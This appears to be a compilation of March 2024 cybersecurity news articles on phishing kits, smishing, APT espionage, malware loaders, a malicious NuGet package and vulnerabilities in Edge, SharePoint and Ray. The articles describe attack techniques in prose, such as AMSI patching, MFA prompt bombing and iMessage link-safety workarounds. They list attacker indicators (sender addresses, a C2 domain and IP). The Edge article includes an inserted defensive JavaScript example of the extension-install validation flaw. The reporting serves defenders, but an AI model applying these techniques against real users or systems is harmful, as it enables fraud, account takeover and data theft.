The phishing sites are hosted on purpose-registered domains that spoof the respective brand names to add a veneer of legitimacy. These domains are backed by Cloudflare, Tencent, Quadranet, and Multacom.
In all, more than 20,000 Darcula-related domains across 11,000 IP addresses have been detected, with an average of 120 new domains identified per day since the start of 2024. Some aspects of the PhaaS service were revealed in July 2023 by Israeli security researcher Oshri Kalfon.
One of the interesting additions to Darcula is its capability to update phishing sites with new features and anti-detection measures without having to remove and reinstall the phishing kit.
"On the front page, Darcula sites display a fake domain for sale/holding page, likely as a form of cloaking to disrupt takedown efforts," the U.K.-based company said. "In previous iterations, Darcula's anti-monitoring mechanism would redirect visitors that are believed to be bots (rather than potential victims) to Google searches for various cat breeds."
Darcula's smishing tactics also warrant special attention as they primarily leverage Apple iMessage and the RCS (Rich Communication Services) protocol used in Google Messages instead of SMS, thereby evading some filters put in place by network operators to prevent scammy messages from being delivered to prospective victims.
"While end-to-end encryption in RCS and iMessage delivers valuable privacy for end users, it also allows criminals to evade filtering required by this legislation by making the content of messages impossible for network operators to examine, leaving Google and Apple's on-device spam detection and third-party spam filter apps as the primary line of defense preventing these messages from reaching victims," Netcraft added.
"Additionally, they do not incur any per-message charges, which are typical for SMS, reducing the cost of delivery."
The departure from traditional SMS-based phishing aside, another noteworthy aspect of Darcula's smishing messages is their sneaky attempt to get around a safety measure in iMessage that prevents links from being clickable unless the message is from a known sender.
This entails instructing the victim to reply with a "Y" or "1" message and then reopen the conversation to follow the link. One such message posted on the r/phishing subreddit shows that users are persuaded to click on the URL by claiming that they have provided an incomplete delivery address for the USPS package.
These iMessages are sent from email addresses such as pl4396@gongmiaq.com and mb6367587@gmail.com, indicating that the threat actors behind the operation are creating bogus email accounts and registering them with Apple to send the messages.
Google, for its part, recently said it's blocking the ability to send messages using RCS on rooted Android devices to cut down on spam and abuse.
The end goal of these attacks is to trick the recipients into visiting bogus sites and handing over their personal and financial information to the fraudsters. There is evidence to suggest that Darcula is geared towards Chinese-speaking e-crime groups.
Phishing kits can have serious consequences, as they permit less-skilled criminals to automate many of the steps needed to conduct an attack, thus lowering barriers to entry.
The development comes amid a new wave of phishing attacks that take advantage of Apple's password reset feature, bombarding users with what's called a prompt bombing (aka MFA fatigue) attack in hopes of hijacking their accounts.
Assuming a user manages to deny all the requests, "the scammers will then call the victim while spoofing Apple support in the caller ID, saying the user's account is under attack and that Apple support needs to 'verify' a one-time code," security journalist Brian Krebs said.
The voice phishers have been found to use information about victims obtained from people search websites to increase the likelihood of success, and ultimately "trigger an Apple ID reset code to be sent to the user's device," which, if supplied, allows the attackers to reset the password on the account and lock the user out.
It's suspected that the perpetrators are abusing a shortcoming in the password reset page at iforgot.apple[.]com to send dozens of requests for a password change in a manner that bypasses rate limiting protections.
The findings also follow research from F.A.C.C.T. that SIM swappers are transferring a target user's phone number to their own device with an embedded SIM (eSIM) in order to gain unauthorized access to the victim's online services. The practice is said to have been employed in the wild for at least a year.
This is accomplished by initiating an application on the operator's website or application to transfer the number from a physical SIM card to an eSIM by masquerading as the victim, causing the legitimate owner to lose access to the number as soon as the eSIM QR Code is generated and activated.
"Having gained access to the victim's mobile phone number, cybercriminals can obtain access codes and two-factor authentication to various services, including banks and messengers, opening up a mass of opportunities for criminals to implement fraudulent schemes," security researcher Dmitry Dudkov said.
Telegram Offers Premium Subscription in Exchange for Using Your Number to Send OTPs
29.3.24
Social
The Hacker News
In June 2017, a study of more than 3,000 Massachusetts Institute of Technology (MIT) students published by the National Bureau for Economic Research (NBER) found that 98% of them were willing to give away their friends' email addresses in exchange for free pizza.
"Whereas people say they care about privacy, they are willing to relinquish private data quite easily when incentivized to do so," the research said, pointing to what's called the privacy paradox.
Now, nearly seven years later, Telegram has introduced a new feature that gives some users a free premium membership in exchange for allowing the popular messaging app to use their phone numbers as a relay for sending one-time passwords (OTPs) to other users who are attempting to sign in to the platform.
The feature, called Peer-to-Peer Login (P2PL), is currently being tested in selected countries for Android users of Telegram. It was first spotted by tginfo in February 2024 (via @AssembleDebug).
According to Telegram's Terms of Service, the phone number will be used to send no more than 150 OTP SMS messages – including international SMS – per month, incurring charges from the user's mobile carrier or service provider.
That said, the popular messaging app notes that it "cannot prevent the OTP recipient from seeing your phone number upon receiving your SMS" and that it "will not be liable for any inconvenience, harassment or harm resulting from unwanted, unauthorized or illegal actions undertaken by users who became aware of your phone number through P2PL."
Even worse, the mechanism – which largely relies on an honor system – doesn't prohibit users from contacting strangers to whose number the OTP authentication SMS was sent, and vice versa, potentially leading to an increase in spam calls and texts.
Telegram said it reserves the right to unilaterally terminate an account from the P2PL program if participants are found sharing personal information about recipients. It also warns users not to contact any OTP recipients or reply to them even if they message them.
As of March 2024, Telegram has more than 900 million monthly active users. It launched the Premium subscription program in June 2022, allowing users to unlock additional features like 4 GB file uploads, faster downloads, and exclusive stickers and reactions.
With online services still relying on phone numbers to authenticate users, it's worth keeping in mind the privacy and security risks that could arise from partaking in the experiment.
Meta in Legal Crosshairs for Intercepting Snapchat Traffic
The development comes as newly unsealed court documents in the U.S. alleged that Meta launched a secret project called Ghostbusters to intercept and decrypt the network traffic from people using Snapchat, YouTube, and Amazon to help it understand user behavior and better compete with its rivals.
This was accomplished by leveraging custom apps from a VPN service called Onavo, which Facebook acquired in 2013 and shut down in 2019 after it came under scrutiny for using its products to track users' web activity related to its competitors and secretly paying teens to capture their internet browsing patterns.
The data-interception scheme has been described as a "man-in-the-middle" approach, in which Facebook essentially paid people between ages 13 and 35 up to $20 per month plus referral fees for installing a market research app and giving it elevated access to inspect network traffic and analyze their internet usage.
The tactic relied on creating "fake digital certificates to impersonate trusted Snapchat, YouTube, and Amazon analytics servers to redirect and decrypt secure traffic from those apps for Facebook's strategic analysis."
The apps were distributed through beta testing services, such as Applause, BetaBound, and uTest, to conceal Facebook's involvement. The program, which later came to be known as In-App Action Panel (IAAP), ran from 2016 to 2018.
Meta, in its response, said there is no crime or fraud, and that "Snapchat's own witness on advertising confirmed that Snap cannot 'identify a single ad sale that [it] lost from Meta's use of user research products,' does not know whether other competitors collected similar information, and does not know whether any of Meta's research provided Meta with a competitive advantage."
Hackers Hit Indian Defense, Energy Sectors with Malware Posing as Air Force Invite
28.3.24
BigBrothers
The Hacker News
Indian government entities and energy companies have been targeted by unknown threat actors with an aim to deliver a modified version of an open-source information stealer malware called HackBrowserData and exfiltrate sensitive information in some cases by using Slack as command-and-control (C2).
"The information stealer was delivered via a phishing email, masquerading as an invitation letter from the Indian Air Force," EclecticIQ researcher Arda Büyükkaya said in a report published today.
"The attacker utilized Slack channels as exfiltration points to upload confidential internal documents, private email messages, and cached web browser data after the malware's execution."
The campaign, observed by the Dutch cybersecurity firm beginning March 7, 2024, has been codenamed Operation FlightNight in reference to the Slack channels operated by the adversary.
Targets of the malicious activity span multiple government entities in India, counting those related to electronic communications, IT governance, and national defense.
The threat actor is said to have successfully compromised private energy companies, harvesting financial documents, personal details of employees, and details about drilling activities in oil and gas. In all, about 8.81 GB of data has been exfiltrated over the course of the campaign.
The attack chain starts with a phishing message containing an ISO file ("invite.iso"), which, in turn, contains a Windows shortcut (LNK) that triggers the execution of a hidden binary ("scholar.exe") present within the mounted optical disk image.
Simultaneously, a lure PDF file that purports to be an invitation letter from the Indian Air Force is displayed to the victim while the malware clandestinely harvests documents and cached web browser data and transmits them to an actor-controlled Slack channel named FlightNight.
The malware is an altered version of HackBrowserData that goes beyond its browser data theft features to incorporate capabilities to siphon documents (Microsoft Office, PDFs, and SQL database files), communicate over Slack, and better evade detection using obfuscation techniques.
It's suspected that the threat actor stole the decoy PDF during a previous intrusion, with behavioral similarities traced back to a phishing campaign targeting the Indian Air Force with a Go-based stealer called GoStealer.
Details of the activity were disclosed by an Indian security researcher who goes by the alias xelemental (@ElementalX2) in mid-January 2024.
The GoStealer infection sequence is virtually identical to that of FlightNight, employing procurement-themed lures ("SU-30 Aircraft Procurement.iso") to display a decoy file while the stealer payload is deployed to exfiltrate information of interest over Slack.
Adapting freely available offensive tools and repurposing legitimate infrastructure such as Slack, which is prevalent in enterprise environments, allows threat actors to reduce time and development costs, as well as to fly under the radar more easily.
Image source: ElementalX2
The efficiency benefits also mean that it's that much easier to launch a targeted attack, even allowing less-skilled and aspiring cybercriminals to spring into action and inflict significant damage on organizations.
"Operation FlightNight and the GoStealer campaign highlight a simple yet effective approach by threat actors to use open-source tools for cyber espionage," Büyükkaya said.
"This underscores the evolving landscape of cyber threats, wherein actors abuse widely used open-source offensive tools and platforms to achieve their objectives with minimal risk of detection and investment."
CISA Warns: Hackers Actively Attacking Microsoft SharePoint Vulnerability
28.3.24
Vulnerability
The Hacker News
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a security flaw impacting the Microsoft SharePoint Server to its Known Exploited Vulnerabilities (KEV) catalog based on evidence of active exploitation in the wild.
The vulnerability, tracked as CVE-2023-24955 (CVSS score: 7.2), is a critical remote code execution flaw that allows an authenticated attacker with Site Owner privileges to execute arbitrary code.
"In a network-based attack, an authenticated attacker as a Site Owner could execute code remotely on the SharePoint Server," Microsoft said in an advisory. The flaw was addressed by Microsoft as part of its Patch Tuesday updates for May 2023.
The development comes more than two months after CISA added CVE-2023-29357, a privilege escalation flaw in SharePoint Server, to its KEV catalog.
It's worth pointing out that an exploit chain combining CVE-2023-29357 and CVE-2023-24955 was demonstrated by StarLabs SG at the Pwn2Own Vancouver hacking contest last year, earning the researchers a $100,000 prize.
That said, there is currently no information on the attacks weaponizing these two vulnerabilities and the threat actors that may be exploiting them.
Microsoft previously told The Hacker News that "customers who have enabled automatic updates and enable 'Receive updates for other Microsoft products' option within their Windows Update settings are already protected."
Federal Civilian Executive Branch (FCEB) agencies are required to apply the fixes by April 16, 2024, to secure their networks against active threats.
Microsoft Edge Bug Could Have Allowed Attackers to Silently Install Malicious Extensions
28.3.24
Vulnerability
The Hacker News
A now-patched security flaw in the Microsoft Edge web browser could have been abused to install arbitrary extensions on users' systems and carry out malicious actions.
"This flaw could have allowed an attacker to exploit a private API, initially intended for marketing purposes, to covertly install additional browser extensions with broad permissions without the user's knowledge," Guardio Labs security researcher Oleg Zaytsev said in a new report shared with The Hacker News.
Tracked as CVE-2024-21388 (CVSS score: 6.5), it was addressed by Microsoft in Edge stable version 121.0.2277.83 released on January 25, 2024, following responsible disclosure in November 2023. The Windows maker credited both Zaytsev and Jun Kokatsu for reporting the issue.
"An attacker who successfully exploited this vulnerability could gain the privileges needed to install an extension," Microsoft said in an advisory for the flaw, adding it "could lead to a browser sandbox escape."
Describing it as a privilege escalation flaw, the tech giant also emphasized that a successful exploitation of the bug requires an attacker to "take additional actions prior to exploitation to prepare the target environment."
According to Guardio's findings, CVE-2024-21388 allows a bad actor with the ability to run JavaScript on bing[.]com or microsoft[.]com pages to install any extension from the Edge Add-ons store without requiring the user's consent or interaction.
This is made possible by the fact that the browser comes with privileged access to certain private APIs that make it possible to install an add-on as long as it's from the vendor's own extension marketplace.
One such API in the Chromium-based Edge browser is edgeMarketingPagePrivate, which is accessible from a set of allowlisted websites that belong to Microsoft, including bing[.]com, microsoft[.]com, microsoftedgewelcome.microsoft[.]com, and microsoftedgetips.microsoft[.]com, among others.
The API also packs in a method called installTheme() that, as the name implies, is designed to install a theme from the Edge Add-ons store by passing a unique theme identifier ("themeId") and its manifest file as input.
The bug identified by Guardio is essentially a case of insufficient validation, thereby enabling an attacker to provide any extension identifier from the storefront (as opposed to the themeId) and get it stealthily installed.
"As an added bonus, as this extension installation is not done quite in the manner it was originally designed for, there will be no need for any interaction or consent from the user," Zaytsev explained.
In a hypothetical attack scenario leveraging CVE-2024-21388, a threat actor could publish a seemingly harmless extension to the add-ons store and use it to inject a piece of malicious JavaScript code into bing[.]com – or any of the sites that are allowed to access the API – and install an arbitrary extension of their choice by invoking the API using the extension identifier.
Put differently, executing the specially crafted extension on the Edge browser and going to bing[.]com will automatically install the targeted extension without the victim's permission.
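The validation gap Guardio describes, as an added example in JavaScript that is not Edge's or Guardio's code: a toy installTheme() that trusts whatever identifier it is handed, beside a hardened version that resolves the id through its own copy of the store and refuses anything whose manifest is not a pure theme (Chromium themes declare a top-level "theme" key and request no permissions). The store catalog, the identifiers and the manifests are constructed for the demonstration.

```javascript
// Added example (not Edge's or Guardio's code). Demonstrates why an API that
// is supposed to install only themes must validate the resolved item, not just
// that the id exists in the store. All ids and manifests below are constructed.

// Constructed add-ons store catalog. The manifests mirror the Chromium layout:
// a theme declares a top-level "theme" key and asks for no permissions, while
// an ordinary extension declares permissions, background scripts, etc.
const STORE = new Map([
  ['theme-ocean-0001', { manifest: { name: 'Ocean', theme: { colors: {} } } }],
  ['ext-helper-0002', { manifest: { name: 'Helper',
                                    permissions: ['history', 'tabs', '<all_urls>'],
                                    background: { service_worker: 'bg.js' } } }],
]);

// Vulnerable shape: any id that exists in the store is installed, so an
// extension id passed where a themeId was expected goes straight through.
function installThemeUnchecked(installed, themeId) {
  const entry = STORE.get(themeId);
  if (!entry) throw new Error('unknown id');
  installed.add(themeId);
  return { id: themeId, permissions: entry.manifest.permissions ?? [] };
}

// A manifest counts as a theme only if it has a "theme" object and none of the
// keys that give an extension code execution or host access.
function isThemeManifest(m) {
  if (!m || typeof m.theme !== 'object' || m.theme === null) return false;
  const forbidden = ['permissions', 'host_permissions', 'background', 'content_scripts'];
  return !forbidden.some((k) => k in m);
}

// Hardened shape: the decision is made on the store's own copy of the manifest;
// a caller-supplied manifest is untrusted input and is only cross-checked.
function installThemeChecked(installed, themeId, callerManifest) {
  const entry = STORE.get(themeId);
  if (!entry) throw new Error('unknown id');
  if (!isThemeManifest(entry.manifest)) {
    throw new Error(`refusing to install ${themeId}: not a theme`);
  }
  if (callerManifest && callerManifest.name !== entry.manifest.name) {
    throw new Error('manifest mismatch');
  }
  installed.add(themeId);
  return { id: themeId, permissions: [] };
}

module.exports = { STORE, isThemeManifest, installThemeUnchecked, installThemeChecked };
```

The key design point is that the check runs on the server-side copy of the manifest after resolving the id: validating the caller's manifest would only let the caller describe a theme while naming an extension.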
Guardio told The Hacker News that while there is no evidence of this bug being exploited in the wild, it highlights the need for balancing user convenience and security, and how browser customizations can inadvertently defeat security mechanisms and introduce several new attack vectors.
"It's relatively easy for attackers to trick users into installing an extension that appears harmless, not realizing it serves as the initial step in a more complex attack," Zaytsev said. "This vulnerability could be exploited to facilitate the installation of additional extensions, potentially for monetary gain."
Critical Unpatched Ray AI Platform Vulnerability Exploited for Cryptocurrency Mining
28.3.24
Cryptocurrency
The Hacker News
Cybersecurity researchers are warning that threat actors are actively exploiting a "disputed" and unpatched vulnerability in an open-source artificial intelligence (AI) platform called Anyscale Ray to hijack computing power for illicit cryptocurrency mining.
"This vulnerability allows attackers to take over the companies' computing power and leak sensitive data," Oligo Security researchers Avi Lumelsky, Guy Kaplan, and Gal Elbaz said in a Tuesday disclosure.
"This flaw has been under active exploitation for the last seven months, affecting sectors like education, cryptocurrency, biopharma, and more."
The campaign, ongoing since September 2023, has been codenamed ShadowRay by the Israeli application security firm. It also marks the first time AI workloads have been targeted in the wild through shortcomings underpinning the AI infrastructure.
Ray is an open-source, fully-managed compute framework that allows organizations to build, train, and scale AI and Python workloads. It consists of a core distributed runtime and a set of AI libraries for simplifying the ML platform.
It's used by some of the biggest companies, including OpenAI, Uber, Spotify, Netflix, LinkedIn, Niantic, and Pinterest, among others.
The security vulnerability in question is CVE-2023-48022 (CVSS score: 9.8), a critical missing authentication bug that allows remote attackers to execute arbitrary code via the job submission API. It was reported by Bishop Fox alongside two other flaws in August 2023.
The cybersecurity company said the lack of authentication controls in two Ray components, Dashboard, and Client, could be exploited by "unauthorized actors to freely submit jobs, delete existing jobs, retrieve sensitive information, and achieve remote command execution."
This makes it possible to obtain operating system access to all nodes in the Ray cluster or attempt to retrieve Ray EC2 instance credentials. Anyscale, in an advisory published in November 2023, said it does not plan to fix the issue at this point in time.
"That Ray does not have authentication built in – is a long-standing design decision based on how Ray's security boundaries are drawn and consistent with Ray deployment best practices, though we intend to offer authentication in a future version as part of a defense-in-depth strategy," the company noted.
It also cautions in its documentation that it's the platform provider's responsibility to ensure that Ray runs in "sufficiently controlled network environments" and that developers can access Ray Dashboard in a secure fashion.
Oligo said it observed the shadow vulnerability being exploited to breach hundreds of Ray GPU clusters, potentially enabling the threat actors to get hold of a trove of sensitive credentials and other information from compromised servers.
This includes production database passwords, private SSH keys, access tokens related to OpenAI, HuggingFace, Slack, and Stripe, the ability to poison models, and elevated access to cloud environments from Amazon Web Services, Google Cloud, and Microsoft Azure.
In many cases, the compromised servers were found to be running cryptocurrency miners (e.g., XMRig, NBMiner, and Zephyr) and reverse shells for persistent remote access.
The unknown attackers behind ShadowRay have also utilized an open-source tool named Interactsh to fly under the radar.
"When attackers get their hands on a Ray production cluster, it is a jackpot," the researchers said. "Valuable company data plus remote code execution makes it easy to monetize attacks — all while remaining in the shadows, totally undetected (and, with static security tools, undetectable)."
Alert: New Phishing Attack Delivers Keylogger Disguised as Bank Payment Notice
28.3.24
Phishing
The Hacker News
A new phishing campaign has been observed leveraging a novel loader malware to deliver an information stealer and keylogger called Agent Tesla.
Trustwave SpiderLabs said it identified a phishing email bearing this attack chain on March 8, 2024. The message masquerades as a bank payment notification, urging the user to open an archive file attachment.
The archive ("Bank Handlowy w Warszawie - dowód wpłaty_pdf.tar.gz") conceals a malicious loader that activates the procedure to deploy Agent Tesla on the compromised host.
"This loader then used obfuscation to evade detection and leveraged polymorphic behavior with complex decryption methods," security researcher Bernard Bautista said in a Tuesday analysis.
"The loader also exhibited the capability to bypass antivirus defenses and retrieved its payload using specific URLs and user agents leveraging proxies to further obfuscate traffic."
Embedding malware within seemingly benign files is a tactic that has been repeatedly employed by threat actors to trick unsuspecting victims into triggering the infection sequence.
The loader used in the attack is written in .NET, with Trustwave discovering two distinct variants that each make use of a different decryption routine to access its configuration and ultimately retrieve the XOR-encoded Agent Tesla payload from a remote server.
In an effort to evade detection, the loader is also designed to bypass the Windows Antimalware Scan Interface (AMSI), which offers the ability for security software to scan files, memory, and other data for threats.
It achieves this by "patching the AmsiScanBuffer function to evade malware scanning of in-memory content," Bautista explained.
The last phase involves decoding and executing Agent Tesla in memory, allowing the threat actors to stealthily exfiltrate sensitive data via SMTP using a compromised email account associated with a legitimate security system supplier in Turkey ("merve@temikan[.]com[.]tr").
The approach, Trustwave said, not only does not raise any red flags, but also affords a layer of anonymity that makes it harder to trace the attack back to the adversary, not to mention save the effort of having to set up dedicated exfiltration channels.
"[The loader] employs methods like patching to bypass Antimalware Scan Interface (AMSI) detection and dynamically load payloads, ensuring stealthy execution and minimizing traces on disk," Bautista said. "This loader marks a notable evolution in the deployment tactics of Agent Tesla."
The disclosure comes as BlueVoyant uncovered another phishing activity conducted by a cybercrime group called TA544 that leverages PDFs dressed up as legal invoices to propagate WikiLoader (aka WailingCrab) and establish connections with command-and-control (C2) infrastructure that consists almost exclusively of hacked WordPress sites.
It's worth noting that TA544 also weaponized a Windows security bypass flaw tracked as CVE-2023-36025 in November 2023 to distribute Remcos RAT via a different loader family dubbed IDAT Loader, allowing it to seize control of infected systems.
The findings also follow a surge in the use of a phishing kit called Tycoon, which Sekoia said has "become one of the most widespread [adversary-in-the-middle] phishing kits over the last few months, with more than 1,100 domain names detected between late October 2023 and late February 2024."
Tycoon, publicly documented by Trustwave last month, permits cyber criminals to target users of Microsoft 365 with phony login pages to capture their credentials, session cookies, and two-factor authentication (2FA) codes. It's known to be active since at least August 2023, with the service offered via private Telegram channels.
The phishing kit is notable for incorporating extensive traffic filtering methods to thwart bot activity and analysis attempts, requiring site visitors to complete a Cloudflare Turnstile challenge before redirecting users to a credential harvesting page.
Tycoon also shares operational and design-level similarities with the Dadsec OTT phishing kit, raising the possibility that the developers had access to and tweaked the source code of the latter to suit their needs. This is supported by the fact that Dadsec OTT had its source code leaked in October 2023.
"The developer enhanced stealth capabilities in the most recent version of the phishing kit," Sekoia said. "The recent updates could reduce the detection rate by security products of the Tycoon 2FA phishing pages and the infrastructure. Additionally, its ease of use and its relatively low price make it quite popular among threat actors."
Two Chinese APT Groups Ramp Up Cyber Espionage Against ASEAN Countries
27.3.24
APT
The Hacker News
Two China-linked advanced persistent threat (APT) groups have been observed targeting entities and member countries affiliated with the Association of Southeast Asian Nations (ASEAN) as part of a cyber espionage campaign over the past three months.
This includes the threat actor known as Mustang Panda, which has been recently linked to cyber attacks against Myanmar as well as other Asian countries with a variant of the PlugX (aka Korplug) backdoor dubbed DOPLUGS.
Mustang Panda, also called Camaro Dragon, Earth Preta, and Stately Taurus, is believed to have targeted entities in Myanmar, the Philippines, Japan and Singapore, targeting them with phishing emails designed to deliver two malware packages.
"Threat actors created malware for these packages on March 4-5, 2024, coinciding with the ASEAN-Australia Special Summit (March 4-6, 2024)," Palo Alto Networks Unit 42 said in a report shared with The Hacker News.
One of the malware packages is a ZIP file that contains an executable ("Talking_Points_for_China.exe") which, when launched, loads a DLL file ("KeyScramblerIE.dll") and ultimately deploys a known Mustang Panda malware called PUBLOAD, a downloader previously employed to drop PlugX.
It's worth pointing out here that the binary is a renamed copy of a legitimate software called KeyScrambler.exe that's susceptible to DLL side-loading.
The second package, on the other hand, is a screensaver executable ("Note PSO.scr") that's used to retrieve next-stage malicious code from a remote IP address, including a benign program signed by a video game company renamed as WindowsUpdate.exe and a rogue DLL that's launched using the same technique as before.
"This malware then attempts to establish a connection to www[.]openservername[.]com at 146.70.149[.]36 for command-and-control (C2)," the researchers said.
Unit 42 said it also detected network traffic between an ASEAN-affiliated entity and the C2 infrastructure of a second Chinese APT group, suggesting a breach of the victim's environment. This unnamed threat activity cluster has been attributed to similar attacks targeting Cambodia.
"These types of campaigns continue to demonstrate how organizations are targeted for cyber espionage purposes, where nation-state affiliated threat groups collect intelligence of geopolitical interests within the region," the researchers said.
Earth Krahang Emerges in Wild
The findings arrive a week after Trend Micro shed light on a new Chinese threat actor known as Earth Krahang that has targeted 116 entities spanning 35 countries by leveraging spear-phishing and flaws in public-facing Openfire and Oracle servers to deliver bespoke malware such as PlugX, ShadowPad, ReShell, and DinodasRAT (aka XDealer).
The earliest attacks date back to early 2022, with the adversary leveraging a combination of methods to scan for sensitive data.
Earth Krahang, which has a strong focus in Southeast Asia, also exhibits some level of overlap with another China-nexus threat actor tracked as Earth Lusca (aka RedHotel). Both the intrusion sets are likely managed by the same threat actor and connected to a Chinese government contractor called I-Soon.
"One of the threat actor's favorite tactics involves using its malicious access to government infrastructure to attack other government entities, abusing the infrastructure to host malicious payloads, proxy attack traffic, and send spear-phishing emails to government-related targets using compromised government email accounts," the company said.
"Earth Krahang also uses other tactics, such as building VPN servers on compromised public-facing servers to establish access into the private network of victims and performing brute-force attacks to obtain email credentials. These credentials are then used to exfiltrate victim emails."
The I-Soon Leaks and the Shadowy Hack-for-hire Scene
Last month, a set of leaked documents from I-Soon (aka Anxun) on GitHub revealed how the company sells a wide array of stealers and remote access trojans like ShadowPad and Winnti (aka TreadStone) to multiple Chinese government entities. This also encompasses an integrated operations platform that's designed to carry out offensive cyber campaigns and an undocumented Linux implant codenamed Hector.
"The integrated operations platform encompasses both internal and external applications and networks," Bishop Fox said. "The internal application is mainly for mission and resource management. The external application is designed to carry out cyber operations."
The obscure hack-for-hire entity has also been implicated in the 2019 POISON CARP campaign aimed at Tibetan groups and the 2022 hack of Comm100, in addition to attacks targeting foreign governments and domestic ethnic minorities to gain valuable information, some of which are carried out on its own initiative in hopes of landing a government customer.
"The data leak has provided rare insight into how the Chinese government outsources parts of its cyber operations to private third-party companies, and how these companies work with one another to fulfill these demands," ReliaQuest noted.
Cybersecurity firm Recorded Future, in its own analysis, said the leak unravels the "operational and organizational ties" between the company and three different Chinese state-sponsored cyber groups, namely RedAlpha (aka Deepcliff), RedHotel, and POISON CARP.
"It provides supporting evidence regarding the long-suspected presence of 'digital quartermasters' that provide capabilities to multiple Chinese state-sponsored groups."
It also said the overlaps suggest the presence of multiple sub-teams focused on particular missions within the same company. I-Soon's victimology footprint spreads to at least 22 countries, with government, telecommunications, and education representing the most targeted sectors.
Furthermore, the publicized documents confirm that Tianfu Cup – China's own take on the Pwn2Own hacking contest – acts as a "vulnerability feeder system" for the government, allowing it to stockpile zero-day exploits and devise exploit code.
"When the Tianfu Cup submissions aren't already full exploit chains, the Ministry of Public Security disseminates the proof of concept vulnerabilities to private firms to further exploit these proof-of-concept capabilities," Margin Research said.
"China's vulnerability disclosure requirement is one part of the puzzle of how China stockpiles and weaponizes vulnerabilities, setting in stone the surreptitious collection offered by Tianfu Cup in previous years."
The source of the leak is currently not known, although two employees of I-Soon told The Associated Press that an investigation is ongoing in collaboration with law enforcement. The company's website has since gone offline.
"The leak provides some of the most concrete details seen publicly to date, revealing the maturing nature of China's cyber espionage ecosystem," SentinelOne's Dakota Cary and Aleksandar Milenkoski said. "It shows explicitly how government targeting requirements drive a competitive marketplace of independent contractor hackers-for-hire."
Sketchy NuGet Package Likely Linked to Industrial Espionage Targets Developers
27.3.24
BigBrothers
The Hacker News
Threat hunters have identified a suspicious package in the NuGet package manager that's likely designed to target developers working with tools made by a Chinese firm that specializes in industrial and digital equipment manufacturing.
The package in question is SqzrFramework480, which ReversingLabs said was first published on January 24, 2024. It has been downloaded 2,999 times as of writing.
The software supply chain security firm said it did not find any other package that exhibited similar behavior.
It, however, theorized the campaign could likely be used for orchestrating industrial espionage on systems equipped with cameras, machine vision, and robotic arms.
The indication that SqzrFramework480 is seemingly tied to a Chinese firm named Bozhon Precision Industry Technology Co., Ltd. comes from the use of a version of the company's logo for the package's icon. It was uploaded by a NuGet user account called "zhaoyushun1999."
Present within the library is a DLL file "SqzrFramework480.dll" that comes with features to take screenshots, ping a remote IP address every 30 seconds until the operation is successful, and transmit the screenshots over a socket created and connected to said IP address.
"None of those behaviors are resolutely malicious. However, when taken together, they raise alarms," security researcher Petar Kirhmajer said. "The ping serves as a heartbeat check to see if the exfiltration server is alive."
The malicious use of sockets for data communication and exfiltration has been observed in the wild previously, as in the case of the npm package nodejs_net_server.
The exact motive behind the package is unclear as yet, although it's a known fact that adversaries are steadily resorting to concealing nefarious code in seemingly benign software to compromise victims.
An alternate, innocuous explanation could be that the package was leaked by a developer or a third party that works with the company.
"They may also explain seemingly malicious continuous screen capture behavior: it could simply be a way for a developer to stream images from the camera on the main monitor to a worker station," Kirhmajer said.
The ambiguity surrounding the package aside, the findings underscore the complicated nature of supply chain threats, making it imperative that users scrutinize libraries prior to downloading them.
"Open-source repositories like NuGet are increasingly hosting suspicious and malicious packages designed to attract developers and trick them into downloading and incorporating malicious libraries and other modules into their development pipelines," Kirhmajer said.
U.S. Charges 7 Chinese Nationals in Major 14-Year Cyber Espionage Operation
27.3.24
BigBrothers
The Hacker News
The U.S. Department of Justice (DoJ) on Monday unsealed indictments against seven Chinese nationals for their involvement in a hacking group that targeted U.S. and foreign critics, journalists, businesses, and political officials for about 14 years.
The defendants include Ni Gaobin (倪高彬), Weng Ming (翁明), Cheng Feng (程锋), Peng Yaowen (彭耀文), Sun Xiaohui (孙小辉), Xiong Wang (熊旺), and Zhao Guangzong (赵光宗).
The suspected cyber spies have been charged with conspiracy to commit computer intrusions and conspiracy to commit wire fraud in connection with a state-sponsored threat group tracked as APT31, which is also known as Altaire, Bronze Vinewood, Judgement Panda, and Violet Typhoon (formerly Zirconium). The hacking collective has been active since at least 2010.
Specifically, their responsibilities entail testing and exploiting the malware used to conduct the intrusions, managing the attack infrastructure, and conducting surveillance of specific U.S. entities, federal prosecutors noted, adding the campaigns are designed to advance China's economic espionage and foreign intelligence objectives.
Both Gaobin and Guangzong are alleged to be linked to Wuhan Xiaoruizhi Science and Technology Company, Limited (Wuhan XRZ), a front company that's believed to have conducted several malicious cyber operations for the Ministry of State Security (MSS).
Intrusion Truth, in a report published in May 2023, characterized Wuhan XRZ as a "sketchy-looking company in Wuhan looking for vulnerability-miners and foreign language experts."
As well as announcing a reward of up to $10 million for information that could lead to identification or whereabouts of people associated with APT31, the U.K. and the U.S. have also levied sanctions against Gaobin, Guangzong, and Wuhan XRZ for endangering national security and for targeting parliamentarians across the world.
"These allegations pull back the curtain on China's vast illegal hacking operation that targeted sensitive data from U.S. elected and government officials, journalists and academics; valuable information from American companies; and political dissidents in America and abroad," stated U.S. Attorney Breon Peace.
"Their sinister scheme victimized thousands of people and entities across the world, and lasted for well over a decade."
The sprawling hacking operation – which took place between at least 2010 and November 2023 – involved the defendants and other members of APT31 sending more than 10,000 emails to targets of interest that purported to be from prominent journalists and seemingly contained legitimate news articles.
But, in reality, they came with hidden tracking links that would allow information about the victims' location, internet protocol (IP) addresses, network schematics, and the devices used to access the email accounts to be exfiltrated simply upon opening the messages.
This information subsequently enabled the threat actors to conduct more targeted attacks tailored to specific individuals, including by compromising the recipients' home routers and other electronic devices.
The threat actors are also said to have leveraged zero-day exploits to maintain persistent access to victim computer networks, resulting in the confirmed and potential theft of telephone call records, cloud storage accounts, personal emails, economic plans, intellectual property, and trade secrets associated with U.S. businesses.
Other spear-phishing campaigns orchestrated by APT31 have further been found to target U.S. government officials working in the White House, at the Departments of Justice, Commerce, Treasury and State, and U.S. Senators, Representatives, and election campaign staff of both political parties.
The attacks were facilitated by means of custom malware such as RAWDOOR, Trochilus RAT, EvilOSX, DropDoor/DropCat, and others that established secure connections with adversary-controlled servers to receive and execute commands on the victim machines. Also put to use was a cracked version of Cobalt Strike Beacon to conduct post-exploitation activities.
Some of the prominent sectors targeted by the group are defense, information technology, telecommunications, manufacturing and trade, finance, consulting, and legal and research industries. APT31 also singled out dissidents around the world and others who were perceived to be supporting them.
"APT31 is a collection of Chinese state-sponsored intelligence officers, contract hackers, and support staff that conduct malicious cyber operations on behalf of the Hubei State Security Department (HSSD)," the Treasury said.
